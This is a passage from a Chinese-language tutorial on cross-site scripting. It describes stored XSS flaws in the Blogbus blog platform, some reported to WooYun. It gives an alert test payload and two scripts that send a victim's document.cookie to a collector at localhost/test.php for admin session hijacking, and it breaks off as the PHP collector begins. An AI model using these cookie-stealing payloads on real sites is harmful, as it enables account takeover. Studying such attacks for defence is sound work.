跨站脚本攻击实例解析.pdfVIP

跨站脚本攻击实例解析 作者：泉哥 主页： 前言 跨站攻击， 即 Cross Site Script Execution( 通常简写为 XSS ，因为 CSS 与层叠样式表同名， 故改为 XSS) 是指攻击者利用网站程序对用户输入过滤不足， 输入可以显示在页面上对其他用户造成影响的 HTML 代码，从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 很多人对于 XSS 的利用大多停留在弹框框的程度，一些厂商对 XSS 也是不以为然，都认为安全级别 很低，甚至忽略不计。本文旨在讲述关于跨站攻击的利用方式，并结合实例进行分析。 漏洞测试 关于对 XSS 的漏洞测试，这里就以博客大巴为例进行测试，最近我也在上面发现了多处跨站漏洞， 其中两处已公布在 WooY un 网站上，其主要内容如下： 漏洞详情 简要描述： 博客大巴存储型 XSS 漏洞 详细说明： 在“个人信息设置”的“附加信息”一项中，由于对“个人简介”的内容过滤不严，导致可在博客首页实现跨站，而 在下方“添加一段附加信息”中，由于对“信息标题”内容过滤不严，同样可导致跨站的出现。 但我刚又测试了一下，发现官方只修补了其中一个漏洞（个人简介） ，而另一个漏洞得在博客管理后 台才能触发，利用价值不大。与此同时我在对博客模板的测试中，又发现了五处跨站漏洞，估计这些 漏洞其实很早就有人发现了，只是没人公布或者报给 blogbus 后仍未修补。这次报给 WooYun 的主要 目的是让 blogbus 修补此漏洞， 因为我的博客就在上面！ ^_^ 其余五处漏洞分别在 “编辑自定义模板” 中，由于对代码模块 head,index,index-post,detail,detail-post 等处的代码过滤不严，导致跨站的发生， 分别向其写入 img src=# onerror=alert(head)/img ，为便于区别，我将提示语句更改为对应的名 称，前三项在首页可触发脚本，后两项需打开文章才可触发，测试结果如图 1、2 所示： 图 1 （在首页触发） 图 2 （打开文章触发） 对于其它网站的测试基本也是大同小异，除了手工测试外，你还可使用其它一些自动扫描工具，比如 Acunetix Web Scanner ,, 漏洞利用 一、窃取 Cookie 对于跨站的攻击方法，使用最多的莫过于 cookie 窃取了，获取 cookie 后直接借助“明小子”工具或 其它可修改 cookie 的浏览器 （如装有 Cookies Edit 插件的 Firefox ）将 cookie 修改为获取的 cookie ，这 样即可获得博客的管理权限。 首先，我们在自定义模板的 head 代码模块中写入 scriptdocument.write(img src=http://localhost/test.php?cookie=+document.cookie+ width=0 height=0 border=0 /);/script 或者 scriptdocument.location = http://localhost/test.php?cookie= + document.cookie;/script 这里我把脚本放在本机上， 你可以根据脚本地址来更改上面的 localhost 地址。 以上两个均可达到同等 效果，但就隐蔽性而言，前者的隐蔽性会更强些，读者可自行选择，当然也有其它语句可达到一样的 目的，就看你如何发挥了。接下来我们来编写上面的 test.php 文件，它主要用于获取对方的 cookie ， 其源代码如下： ? php $ cookie = $_GE